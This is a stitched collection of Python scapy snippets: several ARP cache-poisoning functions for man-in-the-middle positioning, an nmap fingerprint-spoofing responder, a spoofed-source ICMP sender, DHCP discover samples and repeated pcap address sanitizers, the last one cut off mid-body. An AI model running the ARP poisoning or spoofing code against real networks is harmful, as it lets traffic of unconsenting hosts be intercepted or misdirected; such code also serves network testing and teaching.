def PoisonARPCache():
    """Continuously poison the ARP caches of two victims so their traffic is
    steered through the attacker (man-in-the-middle positioning).

    Each victim is sent an ARP *request* (op=1) sourced from ATTACKER_MAC
    whose sender-IP field is the *other* victim's address, so the receiving
    stack learns "peer IP -> ATTACKER_MAC".  The module-level constants
    ATTACKER_MAC, VICTIM_A_MAC, VICTIM_A_IP, VICTIM_B_MAC and VICTIM_B_IP
    must be defined before calling.

    Never returns: the two frames are re-sent every 5 seconds until the
    process is interrupted.  Nothing here restores the victims' caches on
    exit, so the poisoned entries persist until they age out.
    """
    def _poison_frame(victim_mac, victim_ip, impersonated_ip):
        # Frame addressed to the victim; ARP body claims that
        # `impersonated_ip` lives at the attacker's hardware address.
        link = Ether(src=ATTACKER_MAC, dst=victim_mac)
        arp = ARP(op=1, hwsrc=ATTACKER_MAC, psrc=impersonated_ip, pdst=victim_ip)
        return link / arp

    # A learns "B is at the attacker"; B learns "A is at the attacker".
    poison_a = _poison_frame(VICTIM_A_MAC, VICTIM_A_IP, VICTIM_B_IP)
    poison_b = _poison_frame(VICTIM_B_MAC, VICTIM_B_IP, VICTIM_A_IP)

    while True:
        sendp(poison_a)
        sendp(poison_b)
        sleep(5)
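def service_craft(pkt, fp, mac, service, type_=False):
    """Craft a spoofed TCP reply to `pkt` that imitates the fingerprinted host.

    Two reply shapes are produced, selected by `type_`:

    * ``type_=False`` - a SYN/ACK to the incoming SYN (port looks open).
    * ``type_=True``  - a PSH/ACK carrying ``service[<dst port>]`` as
      payload (the fake banner for that port).

    Args:
        pkt: Received scapy packet; must contain IP and TCP layers, an
            Ether layer is optional.
        fp: Fingerprint object; only ``fp.ttl`` (hex string) is used here.
        mac: Hardware address used as the Ethernet source of the reply.
        service: Mapping of destination port -> banner bytes.
        type_: See above.

    Returns:
        The reply packet, with an Ether layer only when `pkt` had one.

    Raises:
        KeyError: if `type_` is set and `pkt`'s destination port is not
            a key of `service`.
    """
    try:
        ether = Ether(src=mac, dst=pkt[Ether].dst, type=0x800)
    except IndexError:
        # No link layer on the incoming packet: reply at layer 3 only.
        ether = None

    ip = IP(src=pkt[IP].dst, dst=pkt[IP].src)
    ip.ttl = int(fp.ttl, 16)
    # Don't Fragment.  scapy's IP.flags is the 3-bit flags field (DF == 2),
    # not the 16-bit flags+fragment-offset word: the previous value 0x4000
    # was masked to 0 when the packet was built, so DF was never set.
    ip.flags = 2

    tcp = TCP(sport=pkt[TCP].dport, dport=pkt[TCP].sport)
    if type_:
        tcp.flags = 0x018  # PSH / ACK
        tcp.seq = pkt[TCP].seq
        tcp.ack = pkt[TCP].ack
        payload = service[pkt[TCP].dport]
        reply = ip / tcp / payload
    else:
        tcp.flags = 0x012  # SYN / ACK
        # NOTE(review): the "server" ISN is simply the client's sequence
        # number; a real stack picks its own.  Behaviour kept as-is.
        tcp.seq = pkt[TCP].seq
        tcp.ack = pkt[TCP].seq + 1
        reply = ip / tcp

    return reply if ether is None else ether / reply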
def Ether_layer(attributes):
    """Build an Ethernet header from a dict with keys 'dst', 'src' and 'type'.

    Args:
        attributes: Mapping holding the destination MAC, source MAC and
            EtherType under exactly those three keys.

    Returns:
        A scapy ``Ether`` layer with those three fields set.

    Raises:
        KeyError: if any of the three keys is missing.
    """
    return Ether(
        dst=attributes['dst'],
        src=attributes['src'],
        type=attributes['type'],
    )
def seqgen_pkt_craft(pkt, fp, mac, pno):
    """Craft the reply to nmap SEQ/T1 probe number `pno` as fingerprint `fp` dictates.

    Addressing mirrors the probe (IP src/dst and TCP ports swapped); every
    other header value comes from ``fp.probe``: ``T1`` for TTL/DF/S/A/F/RD,
    ``WIN`` for the window (key ``'W' + pno``) and ``OPS`` for the TCP
    options (key ``'O' + pno``).

    S: 'Z' -> 0, 'A' -> probe ack, 'A+' -> probe ack + 1, else fp.tcp_seq_gen().
    A: 'Z' -> 0, 'S' -> probe seq, 'S+' -> probe seq + 1, else probe seq + 369.

    Args:
        pkt: Received scapy packet with IP and TCP layers (Ether optional).
        fp: Fingerprint object exposing ``probe``, ``ip_id_gen()`` and
            ``tcp_seq_gen()``.
        mac: Ethernet source address for the reply.
        pno: Probe number as a string, used to select the W/O entries.

    Returns:
        The reply; an Ether layer is prepended only if `pkt` had one.
    """
    try:
        link = Ether(src=mac, dst=pkt[Ether].dst, type=0x800)
    except IndexError:
        link = None

    t1 = fp.probe['T1']

    net = IP(src=pkt[IP].dst, dst=pkt[IP].src)
    net.ttl = int(t1['TTL'], 16)
    # NOTE(review): DF is assigned raw here, whereas ecn_craft() maps
    # 'Y'/'N' to 2/0 first - confirm fp.probe['T1']['DF'] is already in a
    # form scapy's FlagsField accepts.
    net.flags = t1['DF']
    net.id = fp.ip_id_gen()

    seg = TCP(sport=pkt[TCP].dport, dport=pkt[TCP].sport)

    # Sequence number (generator is only consulted in the fallback case).
    s_val = t1['S']
    if s_val == 'Z':
        seg.seq = 0
    elif s_val == 'A':
        seg.seq = pkt[TCP].ack
    elif s_val == 'A+':
        seg.seq = pkt[TCP].ack + 1
    else:
        seg.seq = fp.tcp_seq_gen()

    # Acknowledgement number.
    probe_seq = pkt[TCP].seq
    ack_choices = {'Z': 0, 'S': probe_seq, 'S+': probe_seq + 1}
    seg.ack = ack_choices.get(t1['A'], probe_seq + 369)

    seg.flags = t1['F']
    seg.window = fp.probe['WIN']['W' + pno]
    seg.options = fp.probe['OPS']['O' + pno]

    rd_val = t1['RD']
    if rd_val == '0':
        reply = net / seg
    else:
        # Non-zero RD: the RST carries data, padded by compensate() -
        # presumably so its checksum equals rd_val - TODO confirm.
        crc = int(rd_val, 16)
        payload = b'TCP Port is closed\x00'
        payload += compensate(payload, crc)
        reply = net / seg / payload

    return reply if link is None else link / reply
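def inject_packet(self, iface, dst_mac):
    """Send a unicast IGMP membership query (type 0x11) to `dst_mac` on `iface`.

    The query is built as a general query to 224.0.0.1 with TTL 1 and then
    re-addressed at layer 2 so only the host at `dst_mac` receives it, not
    the whole segment.  The Ethernet source is the all-zero MAC and the IP
    source is 0.0.0.0, i.e. the sender is deliberately not identifiable
    from the frame.

    Args:
        iface: Interface name to transmit on.
        dst_mac: Ethernet address of the target host.

    Side effects: transmits one frame via ``sendp``; reads
    ``self.max_resp_time``.
    """
    ether_part = Ether(src='00:00:00:00:00:00', dst=dst_mac)
    ip_part = IP(ttl=1, src='0.0.0.0', dst='224.0.0.1')
    igmp_part = IGMP(type=0x11)
    # presumably max_resp_time is in milliseconds and /100 converts to the
    # 1/10 s units of the IGMP field - TODO confirm.  int() is required:
    # under Python 3 `/` yields a float and `float & 0xff` is a TypeError.
    igmp_part.mrtime = int(self.max_resp_time / 100) & 0xff
    # igmpize() fixes up the headers for multicast (the original comment
    # implies it also rewrites the Ethernet destination); re-apply dst_mac
    # afterwards so the query goes out unicast.
    igmp_part.igmpize(ether=ether_part, ip=ip_part)
    ether_part.dst = dst_mac
    sendp(ether_part / ip_part / igmp_part, iface=iface, verbose=False)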
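def sanitize(filepath_in, filepath_out=None, sequential=True, ipv4_mask=0,
             ipv6_mask=0, mac_mask=0, start_ipv4='10.0.0.1',
             start_ipv6='2001:aa::1', start_mac='00:aa:00:00:00:00'):
    """Rewrite the MAC and IP addresses in a pcap and write a new pcap.

    Every MAC (Ethernet src/dst, ARP hwsrc/hwdst) and every IPv4/IPv6
    address (IP/IPv6 src/dst, ARP psrc/pdst) is replaced through the
    MACGenerator / IPv4Generator / IPv6Generator mappings, so one real
    address always maps to the same fake address within the file.  Layer
    checksums are reset so scapy recomputes them on write; otherwise the
    original checksums - a function of the real header fields - would
    survive in the "sanitized" output.

    Only header addresses are rewritten.  Packet payloads (DNS, HTTP, TLS
    SNI, ...) and capture timestamps are left untouched and may still leak
    identifying data.

    Args:
        filepath_in: Source pcap.
        filepath_out: Destination path; defaults to
            ``<stem>_sanitized_<YYMMDD-HHMMSS><ext>`` next to the input.
        sequential, ipv4_mask, ipv6_mask, mac_mask, start_*: Forwarded to
            the address generators.

    Returns:
        The base name of the file written.
    """
    if not filepath_out:
        # %M is minutes; the previous '%H%m%S' repeated the month here.
        timestamp = datetime.datetime.now().strftime('%y%m%d-%H%M%S')
        stem, ext = os.path.splitext(filepath_in)
        filepath_out = stem + '_sanitized_' + timestamp + ext

    mac_gen = MACGenerator(sequential=sequential, mask=mac_mask, start_mac=start_mac)
    ip4_gen = IPv4Generator(sequential=sequential, mask=ipv4_mask, start_ip=start_ipv4)
    ip6_gen = IPv6Generator(sequential=sequential, mask=ipv6_mask, start_ip=start_ipv6)

    def _reset_checksums(packet):
        # Walk the layers by index; any layer that owns a chksum field has
        # it set to None so scapy recomputes it from the rewritten headers.
        for depth in range(len(packet.layers())):
            layer = packet[depth]
            if any(f.name == 'chksum' for f in layer.fields_desc):
                layer.chksum = None

    # pcap is binary: 'rb' so no newline translation can corrupt it.
    with open(filepath_in, 'rb') as capfile:
        # parse with pcapfile, re-emit with scapy's PcapWriter
        cap = savefile.load_savefile(capfile, verbose=False)
        pktwriter = PcapWriter(filepath_out, append=True)
        try:
            for raw_pkt in cap.packets:
                pkt = Ether(raw_pkt.raw())

                # Link-layer addresses.
                pkt.src = mac_gen.get_mac(pkt.src)
                pkt.dst = mac_gen.get_mac(pkt.dst)

                # Network-layer addresses.  Frames with neither IP nor IPv6
                # (e.g. ARP) previously raised IndexError and aborted the run.
                if pkt.haslayer('IP'):
                    pkt['IP'].src = ip4_gen.get_ip(pkt['IP'].src)
                    pkt['IP'].dst = ip4_gen.get_ip(pkt['IP'].dst)
                elif pkt.haslayer('IPv6'):
                    pkt['IPv6'].src = ip6_gen.get_ip(pkt['IPv6'].src)
                    pkt['IPv6'].dst = ip6_gen.get_ip(pkt['IPv6'].dst)

                # ARP bodies carry the real addresses too.
                if pkt.haslayer('ARP'):
                    arp = pkt['ARP']
                    arp.hwsrc = mac_gen.get_mac(arp.hwsrc)
                    arp.hwdst = mac_gen.get_mac(arp.hwdst)
                    arp.psrc = ip4_gen.get_ip(arp.psrc)
                    arp.pdst = ip4_gen.get_ip(arp.pdst)

                _reset_checksums(pkt)
                pktwriter.write(pkt)
        finally:
            pktwriter.close()

    return os.path.basename(filepath_out)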
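def udp_craft(pkt, mac, fp):
    """Craft the ICMP reply to nmap's U1 (UDP to closed port) probe.

    Builds an ICMP type 3 message quoting the probe's IP and UDP headers.
    The outer TTL/DF and the quoted fields (RIPL, RID, RIPCK, RUCK) are
    taken from ``fp.probe['U1']`` so the reply matches the target
    fingerprint; the outer IP length (56) and ID (4162) are fixed.

    RIPCK: 'G' -> checksum left for scapy to compute, 'Z' -> 0,
    anything else -> the probe's own IP checksum.
    RUCK:  'G' -> the probe's own UDP checksum, else the literal value.

    Args:
        pkt: Received scapy packet with IP, UDP and Raw layers (Ether optional).
        mac: Ethernet source address for the reply.
        fp: Fingerprint object exposing ``probe['U1']``.

    Returns:
        The reply; an Ether layer is prepended only if `pkt` had one.

    Raises:
        IndexError: if `pkt` has no Raw payload (``pkt[Raw]``).
    """
    try:
        ether = Ether(src=mac, dst=pkt[Ether].dst, type=0x800)
    except IndexError:
        ether = None

    u1 = fp.probe['U1']

    ip = IP(src=pkt[IP].dst, dst=pkt[IP].src)
    ip.ttl = int(u1['TTL'], 16)
    ip.flags = u1['DF']
    ip.len = 56
    ip.id = 4162

    icmp = ICMP(type=3)
    icmp.unused = 0
    # NOTE(review): the original comment said "code 3 for reply" but code 13
    # (communication administratively prohibited) is sent.  nmap's U1 test
    # expects a port-unreachable (code 3); confirm 13 is intentional, since a
    # mismatch makes the spoofed fingerprint distinguishable.
    icmp.code = 13

    # Quoted IP header of the probe.
    iperror = IPerror(proto='udp', ttl=0x3E)
    iperror.len = u1['RIPL']
    iperror.id = u1['RID']
    ripck = u1['RIPCK']
    if ripck == 'Z':
        iperror.chksum = 0
    elif ripck != 'G':
        iperror.chksum = pkt[IP].chksum
    # 'G': leave None so scapy computes it.

    # Quoted UDP header of the probe.
    udperror = UDPerror(sport=pkt[UDP].sport, dport=pkt[UDP].dport, len=pkt[UDP].len)
    if u1['RUCK'] == 'G':
        udperror.chksum = pkt[UDP].chksum
    else:
        udperror.chksum = u1['RUCK']

    # The former `ipl` lookup of probe['U1']['IPL'] was never used and has
    # been dropped.
    data = pkt[Raw].load
    reply = ip / icmp / iperror / udperror / data
    return reply if ether is None else ether / reply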
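def sanitize(
    filepath_in,
    filepath_out=None,
    sequential=True,
    ipv4_mask=0,
    ipv6_mask=0,
    mac_mask=0,
    start_ipv4="10.0.0.1",
    start_ipv6="2001:aa::1",
    start_mac="00:aa:00:00:00:00",
):
    """Rewrite the MAC and IP addresses in a pcap and write a new pcap.

    Every MAC (Ethernet src/dst, ARP hwsrc/hwdst) and every IPv4/IPv6
    address (IP/IPv6 src/dst, ARP psrc/pdst) is replaced through the
    MACGenerator / IPv4Generator / IPv6Generator mappings, so one real
    address always maps to the same fake address within the file.  Layer
    checksums are reset so scapy recomputes them on write; otherwise the
    original checksums - a function of the real header fields - would
    survive in the "sanitized" output.

    Only header addresses are rewritten.  Packet payloads (DNS, HTTP, TLS
    SNI, ...) and capture timestamps are left untouched and may still leak
    identifying data.

    Args:
        filepath_in: Source pcap.
        filepath_out: Destination path; defaults to
            ``<stem>_sanitized_<YYMMDD-HHMMSS><ext>`` next to the input.
        sequential, ipv4_mask, ipv6_mask, mac_mask, start_*: Forwarded to
            the address generators.

    Returns:
        The base name of the file written.
    """
    if not filepath_out:
        # %M is minutes; the previous "%H%m%S" repeated the month here.
        timestamp = datetime.datetime.now().strftime("%y%m%d-%H%M%S")
        stem, ext = os.path.splitext(filepath_in)
        filepath_out = stem + "_sanitized_" + timestamp + ext

    mac_gen = MACGenerator(sequential=sequential, mask=mac_mask, start_mac=start_mac)
    ip4_gen = IPv4Generator(sequential=sequential, mask=ipv4_mask, start_ip=start_ipv4)
    ip6_gen = IPv6Generator(sequential=sequential, mask=ipv6_mask, start_ip=start_ipv6)

    def _reset_checksums(packet):
        # Walk the layers by index; any layer that owns a chksum field has
        # it set to None so scapy recomputes it from the rewritten headers.
        for depth in range(len(packet.layers())):
            layer = packet[depth]
            if any(f.name == "chksum" for f in layer.fields_desc):
                layer.chksum = None

    # pcap is binary: "rb" so no newline translation can corrupt it.
    with open(filepath_in, "rb") as capfile:
        # parse with pcapfile, re-emit with scapy's PcapWriter
        cap = savefile.load_savefile(capfile, verbose=False)
        pktwriter = PcapWriter(filepath_out, append=True)
        try:
            for raw_pkt in cap.packets:
                pkt = Ether(raw_pkt.raw())

                # Link-layer addresses.
                pkt.src = mac_gen.get_mac(pkt.src)
                pkt.dst = mac_gen.get_mac(pkt.dst)

                # Network-layer addresses.  Frames with neither IP nor IPv6
                # (e.g. ARP) previously raised IndexError and aborted the run.
                if pkt.haslayer("IP"):
                    pkt["IP"].src = ip4_gen.get_ip(pkt["IP"].src)
                    pkt["IP"].dst = ip4_gen.get_ip(pkt["IP"].dst)
                elif pkt.haslayer("IPv6"):
                    pkt["IPv6"].src = ip6_gen.get_ip(pkt["IPv6"].src)
                    pkt["IPv6"].dst = ip6_gen.get_ip(pkt["IPv6"].dst)

                # ARP bodies carry the real addresses too.
                if pkt.haslayer("ARP"):
                    arp = pkt["ARP"]
                    arp.hwsrc = mac_gen.get_mac(arp.hwsrc)
                    arp.hwdst = mac_gen.get_mac(arp.hwdst)
                    arp.psrc = ip4_gen.get_ip(arp.psrc)
                    arp.pdst = ip4_gen.get_ip(arp.pdst)

                _reset_checksums(pkt)
                pktwriter.write(pkt)
        finally:
            pktwriter.close()

    return os.path.basename(filepath_out)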
def ecn_craft(pkt, mac, fp):
    """Craft the reply to nmap's ECN probe according to fingerprint `fp`.

    TTL, DF, window (W), control bits (CC) and TCP options (O) come from
    ``fp.probe['ECN']``; addressing mirrors the probe.

    CC -> flags byte: 'Y' -> 0x52 (ECE+SYN+ACK), 'N' -> 0x12 (SYN+ACK),
    'S' -> 0xD2 (CWR+ECE+SYN+ACK), anything else -> 0x10 (ACK only).
    W: 'ECHOED' -> the probe's window, else the literal value.
    O: 'EMPTY' -> options left at scapy's default, else the literal value.

    Args:
        pkt: Received scapy packet with IP and TCP layers (Ether optional).
        mac: Ethernet source address for the reply.
        fp: Fingerprint object exposing ``probe['ECN']`` and ``ip_id_gen()``.

    Returns:
        The reply; an Ether layer is prepended only if `pkt` had one.
    """
    try:
        link = Ether(src=mac, dst=pkt[Ether].dst, type=0x800)
    except IndexError:
        link = None

    ecn = fp.probe['ECN']

    net = IP(src=pkt[IP].dst, dst=pkt[IP].src)
    net.ttl = int(ecn['TTL'], 16)
    net.flags = 2 if ecn['DF'] == 'Y' else 0  # 2 == DF in scapy's 3-bit field
    net.id = fp.ip_id_gen()

    seg = TCP()
    w_val = ecn['W']
    seg.window = pkt[TCP].window if w_val == 'ECHOED' else w_val
    seg.sport = pkt[TCP].dport
    seg.dport = pkt[TCP].sport

    cc_flags = {'Y': 0x52, 'N': 0x12, 'S': 0xD2}
    seg.flags = cc_flags.get(ecn['CC'], 0x10)

    o_val = ecn['O']
    if o_val != 'EMPTY':
        seg.options = o_val

    reply = net / seg
    return reply if link is None else link / reply
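def recv_resp_poke(i: int) -> None:
    """Wait for poke packet number `i` and answer it with a POKE_RESP frame.

    Reads one raw frame (up to 60 bytes, 10 s timeout) from the socket-like
    object returned by ``configure_eth_if()``.  If it is an EtherType 0x2222
    frame whose first payload byte is 0xfa (a poke), the frame is reflected
    to its sender with the socket's own hardware address as source and a
    single-byte 0xfb payload.  Frames of any other type/opcode are ignored.

    Args:
        i: Expected poke sequence number, compared with payload byte 1.

    Raises:
        Exception: if the received poke carries a different sequence number.
        Whatever ``so.recv`` raises on timeout (presumably ``socket.timeout``).
    """
    with configure_eth_if() as so:
        so.settimeout(10)
        eth_frame = Ether(so.recv(60))
        # Only act on our private EtherType with the POKE opcode.  The
        # previous `except Exception as e: raise e` wrapper added nothing
        # and has been removed; errors propagate unchanged.
        if eth_frame.type != 0x2222 or eth_frame.load[0] != 0xfa:
            return
        if eth_frame.load[1] != i:
            raise Exception('Missed Poke Packet')
        # Reflect the frame back to the poker.
        eth_frame.dst = eth_frame.src
        eth_frame.src = so.getsockname()[4]
        eth_frame.load = bytes.fromhex('fb')  # POKE_RESP code
        so.send(raw(eth_frame))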
def sendPackets(gateway_ip, target_ip, this_mac_address, target_mac_address):
    """Send one forged ARP reply telling `target_ip` that `gateway_ip` is at `this_mac_address`.

    The reply (op=2) is unicast to `target_mac_address` both at the
    Ethernet layer and in the ARP target fields, so only that host's cache
    is updated.  Despite the plural name a single frame is sent; ``sendp``
    runs with ``verbose=True`` so scapy prints its send summary.

    Args:
        gateway_ip: IP address to impersonate (ARP psrc).
        target_ip: IP of the victim whose cache is poisoned (ARP pdst).
        this_mac_address: MAC advertised for `gateway_ip`; also the frame source.
        target_mac_address: Victim's MAC (frame destination and ARP hwdst).
    """
    forged_reply = ARP(
        op=2,
        psrc=gateway_ip,
        hwsrc=this_mac_address,
        pdst=target_ip,
        hwdst=target_mac_address,
    )
    frame = Ether(src=this_mac_address, dst=target_mac_address)
    sendp(x=frame / forged_reply, verbose=True)
def icmp_craft(pkt, fp, mac):
    """Craft the echo reply to nmap's IE (ICMP echo) probe per fingerprint `fp`.

    ``fp.probe['IE']`` supplies TTL, the DF policy (DFI) and the code
    policy (CD); id, seq and the payload are echoed from the request.

    DFI: 'N' -> DF clear, 'Y' -> DF set, 'S' -> same as the request,
         anything else -> the opposite of the request's DF.
    CD:  'Z' -> code 0, 'S' -> the request's code, anything else -> a
         random code in 0..15.

    Args:
        pkt: Received scapy packet with IP and ICMP layers (Ether optional).
        fp: Fingerprint object exposing ``probe['IE']`` and ``ip_id_icmp_gen()``.
        mac: Ethernet source address for the reply.

    Returns:
        The echo reply; an Ether layer is prepended only if `pkt` had one.
    """
    try:
        link = Ether(src=mac, dst=pkt[Ether].dst, type=0x800)
    except IndexError:
        link = None

    ie = fp.probe['IE']

    net = IP(src=pkt[IP].dst, dst=pkt[IP].src)
    net.ttl = int(ie['TTL'], 16)
    dfi = ie['DFI']
    if dfi == 'N':
        net.flags = 0
    elif dfi == 'S':
        net.flags = pkt[IP].flags
    elif dfi == 'Y':
        net.flags = 2
    else:
        # Invert the request's DF bit (2 == DF in scapy's 3-bit field).
        net.flags = 0 if pkt[IP].flags == 2 else 2
    net.id = fp.ip_id_icmp_gen()

    echo = ICMP(type=0, id=pkt[ICMP].id, seq=pkt[ICMP].seq)
    cd = ie['CD']
    if cd == 'Z':
        echo.code = 0
    elif cd == 'S':
        echo.code = pkt[ICMP].code
    else:
        echo.code = random.randint(0, 15)

    reply = net / echo / pkt[ICMP].payload
    return reply if link is None else link / reply
def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
    """Send a single forged ARP reply to `target_mac` mapping `gateway_ip` to `my_mac`.

    ARP cache poisoning primitive: the victim at `target_ip`/`target_mac`
    receives an unsolicited ARP reply (op=2) and updates its cache so that
    traffic for the gateway is delivered to `my_mac`.  Sent quietly
    (``verbose=False``).

    Args:
        my_mac: MAC advertised for the gateway; also the frame source.
        gateway_ip: IP being impersonated (ARP psrc).
        target_ip: Victim IP (ARP pdst).
        target_mac: Victim MAC (frame destination and ARP hwdst).
    """
    reply = ARP(op=2, psrc=gateway_ip, hwsrc=my_mac, pdst=target_ip, hwdst=target_mac)
    frame = Ether(src=my_mac, dst=target_mac)
    sendp(x=frame / reply, verbose=False)
def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
    """Emit one malicious ARP reply that binds `gateway_ip` to `my_mac` in the target's cache.

    The frame is unicast to `target_mac` (Ethernet dst and ARP hwdst) with
    ARP opcode 2 (is-at), so only the host at `target_ip` is poisoned.
    ``sendp`` is called with ``verbose=False``.

    Args:
        my_mac: MAC advertised for the gateway; also the frame source.
        gateway_ip: IP being impersonated (ARP psrc).
        target_ip: Victim IP (ARP pdst).
        target_mac: Victim MAC (frame destination and ARP hwdst).
    """
    link_fields = {'src': my_mac, 'dst': target_mac}
    arp_fields = {
        'op': 2,  # is-at (reply)
        'hwsrc': my_mac,
        'psrc': gateway_ip,
        'hwdst': target_mac,
        'pdst': target_ip,
    }
    poison = Ether(**link_fields) / ARP(**arp_fields)
    sendp(x=poison, verbose=False)
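'''
Sample script to send a DHCP discover
'''
import scapy
from scapy.sendrecv import sendp, sniff, srp1
from scapy.all import DHCP, ARP, BOOTP, Ether, UDP, TCP, IP

# data link layer: a client without a lease broadcasts
ethernet = Ether()
ethernet.dst = 'ff:ff:ff:ff:ff:ff'

# network layer: a client with no address sends from 0.0.0.0 (RFC 2131);
# left unset, scapy fills in the interface's current address.
ip = IP()
ip.src = '0.0.0.0'
ip.dst = '255.255.255.255'

# transport layer: DHCP client -> server ports
udp = UDP()
udp.sport = 68
udp.dport = 67

# application layer
bootp = BOOTP()
# BROADCAST is bit 15 (0x8000) of the 16-bit BOOTP flags field; the
# previous value 1 set a reserved bit and left BROADCAST clear.
bootp.flags = 0x8000
# NOTE(review): chaddr is not set, so any offer is addressed to an all-zero
# hardware address - set it to the sending interface's MAC if a real
# server is expected to answer this discover.
dhcp = DHCP()
dhcp.options = [("message-type", "discover"), "end"]

packet = ethernet / ip / udp / bootp / dhcp
# srp1 was not imported before, so this line raised NameError.
ans = srp1(packet)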
def t2tot7_craft(pkt, fp, mac, tno):
    """Craft the reply to one of nmap's T2..T7 probes (`tno`) per fingerprint `fp`.

    Every header value except addressing comes from ``fp.probe[tno]``:
    TTL, DF, S (seq), A (ack), F (flags), W (window), O (options) and RD
    (RST payload).  The IP ID is a random value in 1..1000.

    S: 'Z' -> 0, 'A' -> probe ack, 'A+' -> probe ack + 1, else probe ack + 369.
    A: 'Z' -> 0, 'S' -> probe seq, 'S+' -> probe seq + 1, else probe seq + 369.
    W: 'ECHOED' -> the probe's window, else the literal value.
    O: 'EMPTY' -> options left at scapy's default, else the literal value.

    Args:
        pkt: Received scapy packet with IP and TCP layers (Ether optional).
        fp: Fingerprint object exposing ``probe``.
        mac: Ethernet source address for the reply.
        tno: Probe key into ``fp.probe`` (e.g. 'T2').

    Returns:
        The reply; an Ether layer is prepended only if `pkt` had one.
    """
    try:
        link = Ether(src=mac, dst=pkt[Ether].dst, type=0x800)
    except IndexError:
        link = None

    probe = fp.probe[tno]
    probe_seq = pkt[TCP].seq
    probe_ack = pkt[TCP].ack

    net = IP(src=pkt[IP].dst, dst=pkt[IP].src)
    net.ttl = int(probe['TTL'], 16)
    # NOTE(review): DF is assigned raw here, whereas ecn_craft() maps
    # 'Y'/'N' to 2/0 first - confirm the value is already in scapy form.
    net.flags = probe['DF']
    net.id = random.randint(1, 1000)

    seg = TCP(sport=pkt[TCP].dport, dport=pkt[TCP].sport)
    seq_choices = {'Z': 0, 'A': probe_ack, 'A+': probe_ack + 1}
    seg.seq = seq_choices.get(probe['S'], probe_ack + 369)
    ack_choices = {'Z': 0, 'S': probe_seq, 'S+': probe_seq + 1}
    seg.ack = ack_choices.get(probe['A'], probe_seq + 369)
    seg.flags = probe['F']

    w_val = probe['W']
    seg.window = pkt[TCP].window if w_val == 'ECHOED' else w_val
    o_val = probe['O']
    if o_val != 'EMPTY':
        seg.options = o_val

    rd_val = probe['RD']
    if rd_val == '0':
        reply = net / seg
    else:
        # Non-zero RD: the RST carries data, padded by compensate() -
        # presumably so its checksum equals rd_val - TODO confirm.
        crc = int(rd_val, 16)
        payload = b'TCP Port is closed\x00'
        payload += compensate(payload, crc)
        reply = net / seg / payload

    return reply if link is None else link / reply
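# Usage: <script> SRC_MAC DST_MAC SRC_IP DST_IP IF_NAME REPEAT_INTERVAL REPEAT_COUNT
#
# Sends REPEAT_COUNT ICMP echo requests with caller-chosen L2 and L3 source
# addresses, REPEAT_INTERVAL seconds apart, on the named interface.  Because
# the source is spoofed, any echo replies go to SRC_IP rather than here.
if len(sys.argv) != 8:
    # Explicit check instead of `assert`: asserts are stripped under
    # `python -O`, and this guards the argv indexing below.
    sys.stderr.write('usage: %s SRC_MAC DST_MAC SRC_IP DST_IP IF_NAME '
                     'REPEAT_INTERVAL REPEAT_COUNT\n' % sys.argv[0])
    sys.exit(2)

#*** Get parameters from command line
SRC_MAC = sys.argv[1]
DST_MAC = sys.argv[2]
SRC_IP = sys.argv[3]
DST_IP = sys.argv[4]
IF_NAME = sys.argv[5]
REPEAT_INTERVAL = float(sys.argv[6])
REPEAT_COUNT = int(sys.argv[7])

data = "blahblahblah"  # echo payload

# Ethernet / IP / ICMP echo request (type 8, code 0); built once, the same
# bytes go out every iteration.
eth = Ether(src=SRC_MAC, dst=DST_MAC)
ip = IP(src=SRC_IP, dst=DST_IP)
icmp = ICMP(type=8, code=0)
probe = eth / ip / icmp / data

# At least one packet is always sent (the original loop checked the count
# only after the first send); sleep REPEAT_INTERVAL after each one.
for _ in range(max(REPEAT_COUNT, 1)):
    sendp(probe, iface=IF_NAME)
    time.sleep(REPEAT_INTERVAL)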
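"""
A very basic script to send a DHCP Discover message.
Capture the packages to see what's wrong.
"""
import scapy
from scapy.sendrecv import sendp, sniff
from scapy.all import DHCP, ARP, BOOTP, Ether, UDP, TCP, IP

# NOTE(review): each layer is only built and printed with .show(); nothing
# is assembled or sent, despite the module docstring.

# data link layer
ethernet = Ether()
ethernet.show()
ethernet.dst = "ff:ff:ff:ff:ff:ff"

# network layer
ip = IP()
ip.show()
ip.dst = "255.255.255.255"

# transport layer: DHCP client -> server ports
udp = UDP()
udp.show()
udp.sport = 68
udp.dport = 67

# application layer
bootp = BOOTP()
bootp.show()
# BROADCAST is bit 15 (0x8000) of the 16-bit BOOTP flags field; the
# previous value 1 set a reserved bit and left BROADCAST clear.
bootp.flags = 0x8000

dhcp = DHCP()
dhcp.show()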
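def sanitize(filepath_in, filepath_out=None, sequential=True, ipv4_mask=0,
             ipv6_mask=0, mac_mask=0, start_ipv4='10.0.0.1',
             start_ipv6='2001:aa::1', start_mac='00:aa:00:00:00:01',
             info=True):
    """Rewrite the MAC and IP addresses in a pcap and write a new pcap.

    Every MAC (Ethernet src/dst, ARP hwsrc/hwdst) and every IPv4/IPv6
    address (IP/IPv6 src/dst, ARP psrc/pdst) is replaced through the
    MACGenerator / IPv4Generator / IPv6Generator mappings, so one real
    address always maps to the same fake address within the file.  Layer
    checksums are reset so scapy recomputes them on write; otherwise the
    original checksums - a function of the real header fields - would
    survive in the "sanitized" output.

    Only header addresses are rewritten.  Packet payloads (DNS, HTTP, TLS
    SNI, ...) and capture timestamps are left untouched and may still leak
    identifying data.

    Args:
        filepath_in: Source pcap.
        filepath_out: Destination path; defaults to
            ``<stem>_sanitized_<YYMMDD-HHMMSS><ext>`` next to the input.
        sequential, ipv4_mask, ipv6_mask, mac_mask, start_*: Forwarded to
            the address generators.
        info: When true, print endpoint counts and the output path.
    """
    if not filepath_out:
        # %M is minutes; the previous '%H%m%S' repeated the month here.
        timestamp = datetime.datetime.now().strftime('%y%m%d-%H%M%S')
        stem, ext = os.path.splitext(filepath_in)
        filepath_out = stem + '_sanitized_' + timestamp + ext

    mac_gen = MACGenerator(sequential=sequential, mask=mac_mask, start_mac=start_mac)
    ip4_gen = IPv4Generator(sequential=sequential, mask=ipv4_mask, start_ip=start_ipv4)
    ip6_gen = IPv6Generator(sequential=sequential, mask=ipv6_mask, start_ip=start_ipv6)

    def _reset_checksums(packet):
        # Walk the layers by index; any layer that owns a chksum field has
        # it set to None so scapy recomputes it from the rewritten headers.
        # Replaces the old `del new_pkt[12..1].chksum` loop, which relied on
        # IndexError/AttributeError being swallowed for every other layer.
        for depth in range(len(packet.layers())):
            layer = packet[depth]
            if any(f.name == 'chksum' for f in layer.fields_desc):
                layer.chksum = None

    # pcap is binary: 'rb' so no newline translation can corrupt it.
    with open(filepath_in, 'rb') as capfile:
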